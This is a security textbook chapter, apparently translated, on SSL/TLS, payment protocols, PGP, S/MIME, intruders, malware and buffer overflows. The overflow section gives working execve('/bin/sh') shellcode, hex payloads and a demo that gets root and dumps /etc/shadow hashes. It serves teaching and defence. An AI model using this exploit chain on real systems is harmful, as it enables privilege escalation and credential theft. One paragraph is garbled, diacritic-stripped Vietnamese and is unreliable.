ISAKMP is the Internet Security Association and Key Management Protocol. It provides a framework for key management and defines the procedures and packet formats to establish, negotiate, modify and delete security associations (SAs). ISAKMP is independent of the key exchange protocol, the encryption algorithm and the authentication method.

ISAKMP payloads and exchanges
There are a number of ISAKMP payload types: security, proposal, transform, key, identification, certificate, hash, signature, nonce and delete. ISAKMP has a framework for 5 types of message exchange: base, identity protection, authentication, aggressive and informational.

VII.2 Web security

VII.2.1 Concepts
The Web is used more and more widely by companies, governments and individuals, but the Internet and the Web have serious vulnerabilities and face many security threats concerning:
o Integrity
o Confidentiality
o Denial of service
o Authentication
Additional security mechanisms are therefore needed for the Web.

VII.2.2 SSL (Secure Socket Layer)
SSL is a transport-layer security service, originally developed by Netscape. Version 3 was later designed with public input and became an Internet standard, known as Transport Layer Security (TLS). SSL uses TCP to provide a reliable end-to-end service and has 2 layers of protocols.

VII.2.3 SSL architecture

[Figure: SSL architecture]

Here an SSL connection is:
o A transient, end-to-end communication link
o Associated with 1 SSL session
And an SSL session is:
o An association between user and server
o Created by the Handshake Protocol
o Defines a set of cryptographic parameters
o May be shared by multiple SSL connections

1. SSL Record Protocol services
The SSL Record Protocol ensures message integrity:
o Using a MAC with a shared secret key
o Similar to HMAC but with different padding
and provides confidentiality:
o Using symmetric encryption with a shared key defined by the Handshake Protocol
o IDEA, RC2-40, DES-40, DES, 3DES, Fortezza, RC4-40, RC4-128
o The message is compressed before encryption

2. SSL Change Cipher Spec Protocol
This is one of the 3 SSL-specific protocols that use the SSL Record Protocol. It is a single message that causes the pending state to become the current state and updates the cipher suite in use.

3. SSL Alert Protocol
Conveys SSL-related alerts to the peer. Severity: warning or fatal. Specific alerts:
o fatal: unexpected message, bad record MAC, decompression failure, handshake failure, illegal parameter
o warning: close notify, no certificate, bad certificate, unsupported certificate, certificate revoked, certificate expired, certificate unknown
Alerts are compressed and encrypted like all SSL data.

4. SSL Handshake Protocol
This protocol allows the server and the client to:
o Authenticate each other
o Negotiate the encryption and MAC algorithms
o Negotiate the cryptographic keys to be used
It consists of a series of message phases:
o Establish security capabilities
o Server authentication and key exchange
o Client authentication and key exchange
o Finish

[Figure: SSL handshake]

5. Transport Layer Security
The IETF standard RFC 2246 is similar to SSLv3, with minor differences:
o in the version number of the record format
o it uses HMAC for the MAC
o a pseudo-random function expands the secrets
o it has additional alert codes
o some changes in the supported ciphers
o changes in certificate types and negotiation
o changes in padding and cryptographic computations

We now look in detail at the RADIUS user authentication protocol and the SSL protocol.

The RADIUS protocol
RADIUS is a service for authenticating and authorising users who connect remotely through devices such as modems, DSL, cable or wireless equipment. A site typically has an access server connected to a modem. A RADIUS server is connected to the network as an authentication service. Remote users dial in to the access server, which requests authentication from the RADIUS server. The RADIUS server authenticates the users and allows them to access resources. Network administrators create user profiles on the RADIUS server that define the rights granted to remote users. Challenge-response protocols are used throughout the process of a user logging in to the network.

The SSL protocol
Developed by Netscape, the SSL protocol is widely used on the Internet to authenticate and encrypt information between client and server. SSL can be used to support secure transactions for many different applications on the Internet. SSL is not a single protocol but a set of standardised procedures that carry out the following security tasks:
o Server authentication: allows the user to authenticate the server to which they want to connect. The browser uses public-key techniques to make sure that the server's certificate and public key are valid and were issued by a CA in the client's list of trusted CAs.
o Client authentication: allows the server to authenticate the user who wants to connect. The server also uses public-key techniques to check whether the certificate and public key of the server are valid and were issued by a CA in the list of trusted CAs.
o Connection encryption: all information exchanged between client and server is encrypted in transit to improve confidentiality.

How SSL works
The SSL protocol is built on two sub-protocols: the handshake protocol and the record protocol. The handshake protocol determines the transaction parameters between the two parties that need to exchange information or data, while the record protocol defines the format used for encryption and for two-way transmission between them. The SSL handshake protocol uses the SSL record protocol to exchange some information between server and client the first time an SSL connection is established.
An SSL transaction normally begins with a handshake between the two sides. The steps of the handshake are as follows:
1. The client sends the server the SSL version number in use, the parameters of the encryption algorithms, randomly generated data (digital signature) and other information that the server needs to establish a connection with the client.
2. The server sends the client the SSL version number in use, the parameters of the encryption algorithms, randomly generated data and other information that the client needs to establish a connection with the server. The server also sends its certificate to the client and requests the client's certificate if needed.
3. The client uses some of the information sent by the server to authenticate the server. If the server cannot be authenticated, the user is warned and the connection is not established. If the server is authenticated, the client proceeds to step 4.
4. Using all the information generated in the handshake so far, the client (with the cooperation of the server, and depending on the algorithm in use) creates the premaster secret for the session, encrypts it with the public key that the server sent in its certificate in step 2, and sends it to the server.
5. If the server has requested client authentication, the client signs a piece of data that is unique to this handshake and known to both sides. In this case the client sends both the signed data and its own certificate, together with the encrypted premaster secret, to the server.
6. The server authenticates the client. If the client cannot be authenticated, the session is terminated. If the client is authenticated successfully, the server uses its private key to decrypt the premaster secret and then performs a series of steps to generate the master secret.
7. The client and the server use the master secret to generate the session keys, which are symmetric keys used to encrypt and decrypt the information exchanged during the session and to check data integrity.
8. The client sends a message to the server announcing that subsequent messages will be encrypted with the session key. It then sends an encrypted message announcing that the client has finished its part of the handshake.
9. The server likewise sends a message to the client announcing that subsequent messages will be encrypted with the session key. It then sends an encrypted message announcing that the server has finished its part of the handshake.
10. The handshake is now complete and the SSL session begins. Both client and server use the session keys to encrypt and decrypt the information they exchange and to check data integrity.

VII.3 Secure electronic payment

VII.3.1 Requirements
This is an open encryption and security specification intended to protect credit card payments on the Internet. It was developed in 1996 by Master and Visa Card and is not itself a payment system. Secure electronic payment is a set of security protocols and formats that provides:
o Secure communication between the parties
o Trust, through the use of X509v3
o Privacy, by restricting information to those who need it

[Figure: components of electronic payment]

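VII.3.2 Secure electronic payment
1. The customer opens an account
2. The customer receives a certificate
3. Merchants have their own certificates
4. The customer places an order
5. The merchant is verified
6. The order and payment are sent
7. The merchant requests payment authorisation
8. The merchant confirms the order
9. The merchant provides the goods and services
10. The merchant requests payment

VII.3.3 Dual signature
The customer creates a dual signature over:
o The order information OI for the merchant
o The payment information PI for the bank
Neither party learns the other's details, but both must know that the two items are linked. A dual signature is used for this purpose:
o A signature over the concatenation of OI and PI

VII.3.3 Payment request
The payment request exchange consists of the following 4 messages:
1. Initiate request: get certificates
2. Initiate response: signed response
3. Purchase request: of OI and PI
4. Purchase response: acknowledgement of the order

VII.3.4 Payment request: the customer

[Figure: payment request, customer side]

VII.3.5 Payment request: the merchant

1. Verifies the cardholder's certificate by means of the CA's signature
2. Verifies the dual signature using the customer's public signature key, to be confident that the order has not been tampered with in transit and that it was signed using the cardholder's private signature key
3. Processes the order and forwards the payment information to the payment gateway for authorisation (described later)
4. Sends the payment response to the cardholder

VII.3.6 Payment gateway authorisation
1. Verifies all certificates
2. Decrypts the digital envelope of the authorisation block to obtain the symmetric key, then decrypts the authorisation block
3. Verifies the merchant's signature on the authorisation block
4. Decrypts the digital envelope of the payment block to obtain the symmetric key, then decrypts the payment block
5. Verifies the dual signature on the payment block
6. Verifies that the transaction ID received from the merchant matches the identity in the PI received (indirectly) from the merchant
7. Requests and receives an authorisation from the issuer
8. Sends the authorisation response back to the merchant

VII.3.7 Payment capture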

The merchant sends the payment gateway a payment capture request. The gateway checks the request and then causes the funds to be transferred to the merchant's account. It notifies the merchant and waits for the capture response.

VII.4 Electronic mail security
Electronic mail is one of the most valued and widely used network services. At the same time the contents of messages are not secure: they can be observed in transit or by suitably privileged users on the end systems.
Improving e-mail security is an important goal of every mail system. The following requirements must be met: confidentiality of the message contents, authentication of the sender, integrity of the message, meaning protection from modification, and non-repudiation of origin, meaning protection against denial by the sender.

VII.4.1 The PGP service
PGP (Pretty Good Privacy) is a confidentiality and authentication service that is widely used as a standard for secure e-mail. PGP was developed by Phil Zimmermann. It selects the best available cryptographic algorithms and integrates them into a single program that runs on Unix, PC, Macintosh and other systems. It was originally free; commercial versions now exist. We now look at how PGP operates.

PGP operation: authentication
The sender creates the message, uses SHA-1 to generate a 160-bit hash of it, signs the hash with RSA using the sender's private key and attaches the result to the message. The recipient uses RSA with the sender's public key to decrypt and recover the hash. The recipient verifies the received message by computing its hash and comparing it with the decrypted hash.

PGP operation: confidentiality
The sender creates the message and a random 128-bit number to serve as its session key, and encrypts the message using CAST-128/IDEA/3DES in CBC mode with that session key. The session key is encrypted using RSA with the recipient's public key and attached to the message. The recipient uses RSA with their private key to decrypt and recover the session key. The session key is then used to decrypt the message.

PGP operation: confidentiality and authentication
Both services can be used on the same message. The signature is created and attached to the message, then the message and the signature are encrypted together. The RSA/ElGamal-encrypted session key is attached.

PGP operation: compression
By default PGP compresses the message after signing it but before encrypting it. This makes it possible to store the uncompressed message and signature for later verification, since compression is not deterministic. The ZIP compression algorithm is used.

PGP operation: e-mail compatibility
When PGP is used there is binary data to send (the encrypted message). However, e-mail may have been designed for text only. PGP must therefore encode the raw binary data into printable ASCII characters. It uses the Radix 64 algorithm, which maps 3 bytes to 4 printable characters, and appends a cyclic redundancy check (CRC) to detect transmission errors. PGP also segments the message if it is too large.
In summary, a session key is needed for each message. Its size varies: 56-bit DES, 128-bit CAST or IDEA, 168-bit Triple DES. It is generated using random input data taken from previous uses and from the timing of the user's keystrokes.

PGP private and public keys
Because many private and public keys may be in use, it must be made clear which one was used to encrypt the session key in a message. The full public key could be sent with every message, but that is not enough, because the identity of the sender must be stated. A key identifier can therefore be used to identify the sender. It consists of the least significant 64 bits of the key and is unique; the key identifier can also be used in signatures.

[Figure: PGP message format]

PGP key rings
Each PGP user has a pair of key rings. The public-key ring contains all the public keys of other PGP users known to this user, indexed by key ID. The private-key ring contains this user's public/private key pairs, indexed by key ID and encrypted with a key derived from a hashed passphrase. The security of the public keys thus depends on the security of the passphrase.

PGP message generation
The following diagram describes the process of generating a PGP message to send to the recipient.

[Figure: PGP message generation]

PGP message reception
The following diagram shows how the recipient decrypts and verifies the message in order to read it.

[Figure: PGP message reception]

PGP key management
It is best to rely on a certification authority. In PGP every user is their own CA and can sign keys for users they know directly. This forms a "web of trust". One must trust keys that have been signed, and trust keys signed by others when there is a chain of signatures leading to them. The key ring also contains trust indicators. Users can revoke their own keys.

VII.4.2 Secure/Multipurpose Internet Mail Extensions (S/MIME)
S/MIME is a security enhancement to MIME (Multipurpose Internet Mail Extensions) e-mail. The original Internet mail of RFC822 carried text only; MIME adds support for many content types and multi-part messages, with binary data encoded into textual form. S/MIME adds security, and S/MIME support is available in many mail agents such as MS Outlook, Mozilla, Mac Mail, ...

S/MIME functions
Enveloped data: encrypted content and associated keys. Signed data: the message is encoded and signed after compression. Clear-signed data: the message is in the clear together with an encoded signature over the digest. Signed and enveloped data: signed and encrypted entities can be nested.

S/MIME cryptographic algorithms
Digital signatures: DSS and RSA. Hash functions: SHA-1 and MD5. Session key encryption: ElGamal and RSA. Message encryption: AES, Triple-DES, RC2/40, ... MAC: HMAC with SHA-1. A negotiation process decides which algorithms to use.

S/MIME messages
S/MIME secures MIME entities with a signature, encryption or both, forming MIME-wrapped objects. There is a range of content types: enveloped data, signed data, clear-signed data, registration request, certificate-only message.

S/MIME certificate processing
S/MIME uses X.509 version 3 certificates. They are managed using a hybrid of the X.509 CA hierarchy and PGP's web of trust. Each client has a list of certificates for trusted CAs, plus its own public/private key pairs and certificates. Certificates must be signed by trusted CAs.

Certificate Authorities (CAs)
There are a number of well-known CAs. Verisign is one that is widely used. Verisign issues several types of digital ID, with increasing levels of checking and hence of trust.

Exercises
1. State the purpose of IPSec, its parameters, and AH and ESP.
2. State the purpose of SSL and TLS. Describe their architecture and the tasks of their components.
3. What is secure electronic payment?
4. State the requirements for the dual signature and show that the dual signature in secure electronic payment meets them.
5. Describe the secure electronic payment process and show that it meets the stated security requirements.
6. State the confidentiality, authentication and digital signature requirements of an e-mail system.
7. Present the solution proposed by PGP for e-mail systems.
8. Study HTTP basic authentication in Internet Explorer.

- 120 CHNG 8: K XM NHP, PHN MM C HI V BC TNG LA VIII.1 K xm nhp VIII.1.1 Khi nim Vn quan trng i vi h thng mng l chng li vic truy cp khng mong mun qua mng my tnh ln hoc cc b. Chng ta c th phn loi k xm nhp nh sau: o K gi danh o K lm quyn o Ngi s dng giu mt C nhiu mc kh nng khc nhau xm nhp khc nhau. R rng vn trn c cng khai v tr nn bc xc o T Wily Hacker trong nm 1986/1987 o n vic tng nhanh cc i ng cu tnh trng khn cp ca my tnh Vi i ng cu c th cm thy bnh an nhng i hi cc ngun chi b sung pht trin v duy tr hot ng. K xm nhp c th s dng cc h thng lm hi tn cng. VIII.1.2 Cc k thut xm phm Mc tiu ca k xm nhp l dnh quyn truy cp hoc tng quyn trong h thng. Cc phng php tn cng c bn bao gm o Tm mc tiu v thu thp thng tin o Truy cp ban u o Leo thang quyn o Ln vt khi phc Mc tiu chnh l ginh c mt khu v sau dng quyn truy cp ca ngi s hu. VIII.1.3 on mt khu on mt khu l mt trong cc hng tn cng chung nht. K tn cng bit tn ngi s dng ng nhp (t trang email/web) v tm cch on mt khu. o Mc nh, mt khu ngn, tm kim cc t chung o Thng tin ca ngi dng (thay i tn, ngy sinh, s in thoi, cc mi quan tm v t chung) o Tm kim tng th mi kh nng ca mt khu K xm nhp kim tra ng nhp vi tp mt khu nh cp c. S thnh cng ca vic on mt khu ph thuc vo mt khu c chn bi ngi dng. Tng quan ch ra rng nhiu ngi s dng chn mt khu khng cn thn. Nm bt mt khu Tn cng khc bao gm nm bt mt khu o Theo di qua vai khi nhp password o S dng chng trnh nga thnh Toroa thu thp

o Monitoring an insecure network login, for example Telnet, FTP, Web, e-mail
o Extracting information recorded after a successful login (web cache/history, last number dialled, ...)
o Using a valid login/password to impersonate the user
Users need to be taught to use suitable precautions and countermeasures.

VIII.1.4 Intrusion detection
There will inevitably be security failures somewhere. Intrusions therefore need to be detected in order to:
o Block them if detected quickly
o Act as a deterrent
o Collect information to improve security
The assumption is that an intruder behaves differently from a legitimate user.
o But the difference between the two will be imperfect.

1. Approaches to intrusion detection
Statistical anomaly detection
o Threshold: some statistical threshold is exceeded
o Profile based
Rule based
o Anomalous behaviour
o Penetration identification

2. Audit records
The fundamental tool for intrusion detection is the audit record.
Native audit records
o Part of every multi-user operating system
o Already available for use
o May not hold the information in the desired form
Detection-specific audit records
o Created specifically to collect the wanted information
o At the cost of additional overhead on the system

3. Statistical anomaly detection
Threshold detection
o Count occurrences of a specific event over time
o If the count exceeds some value, assume an intrusion
o Used alone, this is a crude and ineffective detector
Profile based
o Characterise the past behaviour of users
o Detect significant deviations from it
o The profile is usually multi-parameter

4. Audit record analysis
This is the foundation of the statistical approaches. Records are analysed to obtain metrics over time:
o Counter, gauge, interval timer, resource use
Various tests are applied to the analysed data to decide whether current behaviour is acceptable:
o Mean and standard deviation, multivariate, Markov process, time series, operational

The main advantage is that no prior knowledge is used.

5. Rule-based intrusion detection
Observe events on the system and apply rules to decide whether the activity is suspicious.
Rule-based anomaly detection
o Analyse historical audit records to identify usage patterns and automatically generate rules for them
o Then observe current behaviour and match it against the rules to see whether it conforms
o Like statistical anomaly detection, it needs no prior knowledge of security flaws
Rule-based penetration identification
o Uses expert-system technology
o With rules identifying known penetrations, weakness patterns, or suspicious behaviour
o Audit records or states are compared against the rules
o Rules are generated by experts who interview security administrators and codify their knowledge
o Quality depends on how well this is done

Base-rate fallacy
o In practice an intrusion detection system needs to detect a substantial percentage of intrusions with very few false alarms
  - If too few intrusions are detected: poor security
  - If there are too many false alarms: they are ignored, or time is wasted
o This is very hard to do
o Existing systems do not seem to have a good record

Distributed intrusion detection
o Traditionally the focus is on single systems
o But typically systems are networked
o Effective defence has them working together to detect intrusions
o Issues:
  - Dealing with differing audit record formats
  - Integrity and confidentiality of the data on the network
  - Centralised versus distributed architecture

Using honeypots
o Decoy systems to lure attackers
  - Away from access to critical systems
  - To collect information about their activities
  - To encourage the attacker to stay on the system so that the administrator can respond
o They are filled with fabricated information
o They are instrumented to collect detailed information about the attacker's activities
o They may be single or multiple networked systems

VIII.1.5 Password management
o The front-line defence against intruders
o Users supply both:
  - Login: determines the privileges of the user

  - Password: identifies them
o Passwords are usually stored encrypted
  - Unix uses multiple DES
  - More recent systems use a hash function
o The password file on the system must be protected

Password studies
o Purdue 1992: many short passwords
o Klein 1990: many guessable passwords
o The conclusion is that users often choose poor passwords
o An approach is needed to counter this

Managing passwords: education
o Use policies and user education
o Teach the importance of good passwords
o Give guidelines for good passwords
  - Minimum length > 6
  - Require a mix of upper- and lower-case letters, digits and punctuation
  - Do not use dictionary words
o But many people are likely to pay no attention to this

Managing passwords: computer generated
o Let the computer create the passwords
o If they are random they are hard to remember, so they get written down (sticky-label syndrome)
o Even pronounceable ones are not remembered
o There is a history of poor user acceptance
o FIPS PUB 181 is one of the best generators
  - It has both a description and sample code
  - It generates words by concatenating random pronounceable syllables

Managing passwords: proactive checking
o The most promising approach to improving password security
o Users are allowed to select their own password
o But the system verifies that it is acceptable
  - Simple rule enforcement
  - Comparison against a dictionary of bad passwords
  - Use of an algorithmic Markov model or a filter to detect poor choices

VIII.2 Malicious software

VIII.2.1 Types of malicious software other than viruses
Computer viruses have had a lot of publicity and are one kind of malicious software. Their effects are well known and have featured in news reports, fiction and films, drawing more attention than harm, and much effort goes into defending against them.

1. Backdoor or trapdoor
A secret entry point into a program that lets those who know of it gain access while bypassing the usual security procedures. The technique has commonly been used by developers, and it is a threat when left in production programs, where it allows exploitation

by attackers. It is very hard to block in the operating system and requires good software development and updating.

2. Logic bomb
One of the oldest types of malicious software: code embedded in a legitimate program. It is activated when specified conditions are met:
o Presence or absence of some file
o A particular date/time
o A particular user
When triggered it typically damages the system:
o Modifies/deletes files/disks, halts the machine, ...

3. Trojan horse
A program with hidden side effects, usually superficially attractive, such as a game or a software upgrade. When run it performs additional tasks, allowing the attacker to gain indirectly access that they do not have directly. It is often used to propagate a virus/worm, to install a backdoor, or simply to destroy data.

4. Zombie
A program that secretly takes over another networked computer and uses it to launch attacks indirectly. It is often used to launch distributed denial-of-service (DDoS) attacks. It exploits vulnerabilities in systems.

VIII.2.2 Viruses
A virus is a piece of self-replicating code attached to other code, like a biological virus. Both propagate themselves and carry a payload:
o It carries the code to make copies of itself
o And, like any code, it also performs some covert task

Virus operation
Virus phases:
o Dormant: waiting for a trigger event
o Propagation: replicating to programs/disks
o Triggering: by an event, to execute the payload
o Execution of the payload
The details are usually specific to the machine and operating system. The virus exploits their features and weaknesses.

Virus structure
program V :=
{goto main;
 1234567;
 subroutine infect-executable :=
   {loop: file := get-random-executable-file;
    if (first-line-of-file = 1234567) then goto loop
    else prepend V to file; }
 subroutine do-damage := {whatever damage is to be done}
 subroutine trigger-pulled := {return true if condition holds}
 main: main-program :=
   {infect-executable;
    if trigger-pulled then do-damage;
    goto next;}

 next:
}

Types of virus
Viruses can be classified by how they attack:
o Parasitic virus
o Memory-resident virus
o Boot sector virus
o Stealth
o Polymorphic virus
o Metamorphic virus

1. Macro virus
Macro code attached to a data file and interpreted by the program that uses the file:
o For example Word/Excel macros
o Uses auto commands and macro commands
The code is platform independent, and it is a major source of new virus infections. It blurs the distinction between data and program files, and it reflects the classic trade-off between ease of use and security. Security in Word has improved, and macro viruses are no longer the dominant virus threat.

2. E-mail virus
A virus that spreads using e-mail with an attachment containing a macro virus, such as Melissa. It is usually triggered when the user opens the attachment, or less often when the mail is viewed, by using a scripting feature of the mail agent. It therefore spreads very quickly. The usual targets are the Microsoft Outlook mail agent or Word/Excel documents. Better operating system and application security is needed.

3. Worms
A worm is a replicating program that does not infect other programs and typically spreads over a network:
o For example the Morris Internet worm of 1988
o It led to the creation of the CERT computer emergency response teams
o Worms use distributed privileges or exploit system vulnerabilities
o They are widely used by hackers to create zombie PCs, which are then used for further attacks, especially denial of service (DoS)
The major issue is the lack of security of permanently connected systems such as PCs.

Worm operation
The worm phases are like those of a virus:
o Dormant
o Propagation
  - Search for other systems to infect
  - Establish a connection to the remote target system
  - Replicate itself onto the remote system
o Triggering
o Execution

4. The Morris worm

The Morris worm is the classic worm, released by Robert Morris in 1988 and targeted at Unix systems. It used several propagation techniques, such as:
o Simple password cracking of the local password file
o Exploiting a vulnerability
o Finding a trapdoor bug in the mail system
Every successful attack then replicated it.

5. Recent worm attacks
A new wave of worm attacks started in mid-2001, for example:
- Code Red: used a hole in MS IIS
  o Probed random IPs for systems running IIS
  o Had a time trigger for a denial-of-service attack
  o The second wave infected 360000 servers within 14 hours
- Code Red 2: installed a backdoor
- Nimda: multiple infection mechanisms
- SQL Slammer: attacked MS SQL servers
- Sobig: attacked open proxy servers
- Mydoom: mass e-mail worm with a backdoor

6. Worm technology
The characteristics of worm technology are multi-platform attacks, multiple exploits, ultrafast spreading, multiple payload types, polymorphism, metamorphism, and zero-day exploits.

7. Virus countermeasures
The best countermeasure is prevention, but in general that is not possible. One or more of the following is therefore needed:
o Detection of a virus in an infected system
o Identification of the specific infecting virus
o Removal, restoring the system to a clean state

8. Anti-virus software
First generation
o A scanner uses virus signatures for identification
o Or detects changes in program length
Second generation
o Uses heuristic rules to detect virus infection
o Uses a hash of the program to detect changes
Third generation
o Memory-resident programs that identify a virus by its actions
Fourth generation
o Packages with a variety of anti-virus techniques
o Scanning and activity traps, access control
Manual eradication is still used.

9. Advanced anti-virus techniques
Generic decryption
o Uses CPU simulation to check a program, its signature and its behaviour before it is run
Digital Immune System (IBM)

o General-purpose emulation and virus detection
o Any virus entering the organisation is captured and analysed, a detection/shield is created for it, and it is removed
The diagram of the Digital Immune System follows.

VIII.2.3 Behaviour-blocking software
This software is integrated with the operating system of the host. The program monitors behaviour in real time:
o For example file access, disk formatting, execution modes, changes to system parameters, network access
For actions that may be malicious:
o If detected, it blocks, terminates or investigates them
It has an advantage over scanners, but the malicious code runs before it is detected.

1. Distributed denial-of-service attacks
Distributed denial-of-service (DDoS) attacks are a significant threat. They make systems unavailable by flooding them with useless traffic. Attackers often use a large number of "zombies", and the attacks are growing in sophistication. Defence technology is looking for ways to counter them.


2. How an adversary builds a distributed denial-of-service attack network
Denial of service becomes effective when very many "zombies" have been infected. This requires:
- Software that implements the distributed denial-of-service attack
- An unpatched vulnerability present on many systems
- A scanning strategy for finding vulnerable systems: random, hit list, topological, local subnet

3. Countermeasures against distributed denial of service (DDoS)
Three lines of defence are widely used:
- Attack prevention and preemption, beforehand
- Attack detection and filtering, while the service is in use
- Attack source traceback and identification, afterwards
In general the range of possible attacks is wide, so several countermeasures are needed and must be used in combination.

VIII.3 Buffer overflow
Buffer overflow is a very common attack mechanism, from the appearance of the Morris worm in 1988 through Code Red, Slammer, Sasser and many others. The prevention techniques are known. It remains a concern, however, because of the legacy of widely deployed buggy code, and because careless programming techniques persist.

Buffer overflow basics: it is caused by a programming error that allows more data to be stored than the capacity of a fixed-size buffer. The buffer can be on the stack, on the heap, or in global data. The overflow overwrites adjacent memory locations, which can corrupt program data, cause an unexpected transfer of control, cause memory access violations, or execute code chosen by the attacker.

VIII.3.1 Buffer overflow example

Buffer Overflow Example


int main(int argc, char *argv[]) {
    int valid = FALSE;
    char str1[8];
    char str2[8];

    next_tag(str1);
    gets(str2);
    if (strncmp(str1, str2, 8) == 0)
        valid = TRUE;
    printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid);
}

$ cc -g -o buffer1 buffer1.c

$ ./buffer1
START
buffer1: str1(START), str2(START), valid(1)

$ ./buffer1
EVILINPUTVALUE
buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0)

$ ./buffer1
BADINPUTBADINPUT
buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)

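Consider the C program above. It has three variables, which are normally stored in adjacent memory locations. It calls a subroutine that copies the data START into str1. It then reads input with the gets function and stores it in str2. It then compares the input with the string START. If they match, valid = true.

The problem is that the C library function gets does not check the size of the data it reads. If the input is more than 7 characters long, it needs more memory than is available. The excess data then overwrites the data of the adjacent variable, which in this case is str1. Suppose the input string is EVILINPUTVALUE: the result is that str1 is overwritten with the characters TVALUE. The string str2 uses not only its own 8 characters but also 7 more characters from str1. Knowing this layout, the attacker can arrange for the value of str1 to remain equal to str2. For example, if the input string is BADINPUTBADINPUT, the comparison still succeeds, as in the third run in the example above.

VIII.3.2 Buffer overflow attacks
To overflow a buffer, the attacker must identify a buffer overflow vulnerability in some program, by inspection, by tracing execution, or by using fuzzing tools. The attacker must also understand how the buffer is stored in memory and determine the potential for corruption.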


Function Calls and Stack Frames

A little programming language history. At the machine level all data is an array of bytes, and its interpretation depends on the instructions used. Modern high-level languages have a strong notion of type and of valid operations. They are not vulnerable to buffer overflows, but this comes with overhead and some limits on use. C and related languages have high-level control structures but allow direct access to memory. They are therefore vulnerable to buffer overflows. There is a large legacy of unsafe code in wide use, which is therefore vulnerable.

To understand better why buffer overflows happen and persist, consider the mechanism by which a function call manages the local state of each call. When one function calls another, it must save the return address somewhere so that the called function can return control to the caller when it finishes. It also needs somewhere to store the parameters to be passed to the called function, and to save the register values of the caller that will be needed again when the called function finishes. Normally all of this data is stored in a stack frame. Each function call creates an associated stack frame.

A stack buffer overflow occurs when the buffer is located on the stack. It was exploited by the Morris worm. The article "Smashing the Stack" publicised it. Local variables sit below the saved frame pointer and the return address. An overflow of a local buffer is therefore likely to overwrite these key control items. The attacker overwrites the return address with the address of the injected code. This can be an address in the program, in a system library, or of code loaded into the buffer.

Now consider the layout of memory in which a running program, its global data, the heap and the stack are held. When a program runs, the operating system creates a process for it. The process is given its own virtual address space with the structure shown in the following figure. It contains the contents of the running program, including global data, the relocation table, and the program code near the bottom of the address space. Above that is the space for the heap, which grows upwards, and above that again is the space for the stack, which grows downwards.


Programs and Processes

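To illustrate a stack buffer overflow, consider the following C program. It has a single local variable, the buffer inp. The function hello prompts for a name, which is read into the buffer with the unsafe library function gets(). It then displays the value read with the library function printf(). If a small value is read there is no problem: the program calling the function runs successfully, as in the first run in the following figure. If the data is large, as in the second run, it extends past the end of the buffer and overwrites the saved frame pointer and the return address with wrong values corresponding to the binary representation of the characters. When the function then returns control to the return address, it jumps to an invalid memory location, reports "Segmentation Fault" and terminates the program abnormally, as the message in the following figure shows. An attacker takes advantage of this opportunity to transfer control to a location of their choosing.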


Stack Overflow Example


void hello(char *tag)
{
    char inp[16];

    printf("Enter value for %s: ", tag);
    gets(inp);
    printf("Hello your %s is %s\n", tag, inp);
}

$ cc -g -o buffer2 buffer2.c

$ ./buffer2
Enter value for name: Bill and Lawrie
Hello your name is Bill and Lawrie
buffer2 done

$ ./buffer2
Enter value for name: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Segmentation fault (core dumped)

$ perl -e 'print pack("H*", "414243444546474851525354555657586162636465666768
08fcffbf948304080a4e4e4e4e0a");' | ./buffer2
Enter value for name:
Hello your Re?pyy]uEA is ABCDEFGHQRSTUVWXabcdefguyu
Enter value for Kyyu:
Hello your Kyyu is NNNN
Segmentation fault (core dumped)

VIII.3.3 Shellcode
This is program code prepared by the attacker. It is stored in the overflowed buffer, and the attacker tries to transfer control to it so that it hands control to a shell.

Example Shellcode
        nop
        nop                     // end of nop sled
        jmp  find               // jump to end of code
cont:   pop  %esi               // pop address of sh off stack into %esi
        xor  %eax,%eax          // zero contents of EAX
        mov  %al,0x7(%esi)      // copy zero byte to end of string sh (%esi)
        lea  (%esi),%ebx        // load address of sh (%esi) into %ebx
        mov  %ebx,0x8(%esi)     // save address of sh in args[0] (%esi+8)
        mov  %eax,0xc(%esi)     // copy zero to args[1] (%esi+c)
        mov  $0xb,%al           // copy execve syscall number (11) to AL
        mov  %esi,%ebx          // copy address of sh (%esi) to %ebx
        lea  0x8(%esi),%ecx     // copy address of args (%esi+8) to %ecx
        lea  0xc(%esi),%edx     // copy address of args[1] (%esi+c) to %edx
        int  $0x80              // software interrupt to execute syscall
find:   call cont               // call cont which saves next address on stack
sh:     .string "/bin/sh "      // string constant
args:   .long 0                 // space used for args array
        .long 0                 // args[1] and also NULL for env array

90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1 ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20


Example Stack Overflow Attack


$ dir -l buffer4
-rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4

$ whoami
knoppix
$ cat /etc/shadow
cat: /etc/shadow: Permission denied

$ cat attack1
perl -e 'print pack("H*",
"90909090909090909090909090909090" .
"90909090909090909090909090909090" .
"9090eb1a5e31c08846078d1e895e0889" .
"460cb00b89f38d4e088d560ccd80e8e1" .
"ffffff2f62696e2f7368202020202020" .
"202020202020202038fcffbfc0fbffbf0a");
print "whoami\n";
print "cat /etc/shadow\n";'

$ attack1 | buffer4
Enter value for name: Hello youryyy)DA0Apy is e?^1AFF.../bin/sh...
root
root:$1$rNLId4rX$nka7JlxH7.4UJT4l9JRLk1:13346:0:99999:7:::
daemon:*:11453:0:99999:7:::
...
nobody:*:11453:0:99999:7:::
knoppix:$1$FvZSBKBu$EdSFvuuJdKaCH8Y0IdnAv/:13346:0:99999:7:::
...

Shellcode development
The example above shows basic Intel Linux shellcode that runs the Bourne shell interpreter. The shellcode has to set up the arguments for execve(). It contains all the code needed to invoke the system function, it must be position independent, and it must not contain NULLs, the C string terminator. The programs targeted are typically trusted system utilities, particular network services, and commonly used library code, for example for images. Shellcode functions include: spawning a shell, creating a listener that starts a shell on connection, creating a reverse connection back to the attacker, bypassing firewall rules, and breaking out of a restricted execution environment.

VIII.3.4 Buffer overflow defences
Buffer overflows are widely exploited, and a lot of vulnerable code is in use, even though the cause and the countermeasures are known. There are two broad defence approaches: compile-time defences, which harden new programs, and run-time defences, which detect and stop attacks on existing programs.

If a high-level language with strong typing is used, there is no buffer overflow vulnerability. The compiler enforces range checks and the operations permitted on variables. This comes at a cost in resource use and in restricted access to hardware. Some code in C-like languages is still needed, however.

Compile-time defences
Establish safe coding techniques. If a potentially unsafe language such as C is used, programmers need to write safe code explicitly, by design for new

